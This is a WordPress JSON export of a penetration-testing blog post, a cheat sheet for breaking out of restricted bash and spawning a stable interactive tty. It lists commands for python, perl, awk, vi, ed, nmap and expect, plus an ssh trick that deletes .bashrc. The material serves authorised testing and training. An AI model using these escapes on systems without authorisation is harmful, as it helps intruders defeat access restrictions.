{"id":134,"date":"2021-04-24T01:43:14","date_gmt":"2021-04-24T01:43:14","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=134"},"modified":"2021-10-06T00:13:30","modified_gmt":"2021-10-06T00:13:30","slug":"break-out-get-that-tty","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/break-out-get-that-tty\/","title":{"rendered":"Break Out. Get that tty."},"content":{"rendered":"\n<div class=\"wp-block-cover has-background-dim\"><img loading=\"lazy\" decoding=\"async\" width=\"3792\" height=\"5688\" class=\"wp-block-cover__image-background wp-image-96\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/04\/10.jpg\" data-object-fit=\"cover\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-vivid-red-color has-text-color\">S1REN<\/p>\n\n\n\n<p>Breaking out of a restricted shell.<\/p>\n\n\n\n<p class=\"has-text-align-center has-large-font-size\">Spawn a valid tty.<br><br>::Teletype<\/p>\n<\/div><\/div>\n\n\n\n<p id=\"tty\"><br><strong>Out of the gate.<\/strong><\/p>\n\n\n<p><code><\/code><\/p>\n<p>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<br \/>OR<br \/>python3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'<br \/>export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/tmp<br \/>export TERM=xterm-256color<br \/><span class=\"s1\">alias ll='ls -lsaht --color=auto'<br \/><\/span><span class=\"s1\"><strong>Keyboard Shortcut:<\/strong> Ctrl + Z (Background Process.)<br \/>stty raw -echo ; fg ; reset<br \/>stty columns 200 rows 200<\/span><\/p>\n<p>\u00a0<\/p>\n<p>* Grab a valid tty.<br \/>* What OS are you on? Grab access to those binaries fast by exporting each environment variable. Debian\/CentOS\/FreeBSD<br \/>* Want a color terminal to easily tell apart file permissions? Directories? 
Files?<br \/>* Fastest way to list out the files in a directory, show size, show permissions, human readable.<br \/>* Make this shell stable.<\/p>\n\n\n\n<p><br><br><strong>Is this rbash<\/strong> (<em>Restricted Bash<\/em>)<strong>?<\/strong> PT1<br>$ vi<br>:set shell=\/bin\/sh<br>:shell<br><br>$ vim<br>:set shell=\/bin\/sh<br>:shell<br><br><strong>Is this rbash<\/strong> (<em>Restricted Bash<\/em>)<strong>?<\/strong> PT2<br>(<em>This requires ssh user-level access<\/em>)<br>ssh user@127.0.0.1 \"\/bin\/sh\"<br>rm $HOME\/.bashrc<br>exit<br>ssh user@127.0.0.1<br>(<em>Bash Shell<\/em>) <\/p>\n\n\n\n<p><strong>Is python present on the target machine?<\/strong><br>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<br>python -c 'import pty; pty.spawn(\"\/bin\/sh\")'<\/p>\n\n\n\n<p><strong>Is perl present on the target machine?<\/strong><br>perl -e 'exec \"\/bin\/bash\";'<br>perl -e 'exec \"\/bin\/sh\";'<\/p>\n\n\n\n<p><strong>Is AWK present on the target machine?<\/strong><br>awk 'BEGIN {system(\"\/bin\/bash -i\")}'<br>awk 'BEGIN {system(\"\/bin\/sh -i\")}'<\/p>\n\n\n\n<p><strong>Is ed present on the target machine?<\/strong><br>ed<br>!sh<\/p>\n\n\n\n<p><strong>Is IRB present on the target machine?<\/strong><br>exec \"\/bin\/sh\"<\/p>\n\n\n\n<p><strong>Is Nmap present on the target machine?<\/strong><br>nmap --interactive<br>nmap&gt; !sh<\/p>\n\n\n\n<p><strong>Expect:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>expect -v\n  expect version 5.45.4\n  \n$ cat &gt; \/tmp\/shell.sh &lt;&lt;EOF\n#!\/usr\/bin\/expect\nspawn bash\ninteract\nEOF\n\n$ chmod u+x \/tmp\/shell.sh\n$ \/tmp\/shell.sh<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Out of the gate. 
python -c 'import pty; pty.spawn(\"\/bin\/bash\")'ORpython3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'export PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/tmpexport TERM=xterm-256coloralias ll='ls -lsaht --color=auto'Keyboard Shortcut: Ctrl + Z (Background Process.)stty raw -echo ; fg ; resetstty columns 200 rows 200 \u00a0 * Grab a valid tty.* What OS are you on? Grab access to those binaries fast by exporting each environment [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":96,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[14,13,12,10,4,11],"class_list":["post-134","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-breakout","tag-jailed-shell","tag-pentest","tag-restricted-shell","tag-s1ren","tag-tty"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=134"}],"version-history":[{"count":10,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/134\/revisions"}],"predecessor-version":[{"id":477,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/134\/revisions\/477"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/96"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categorie
s?post=134"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}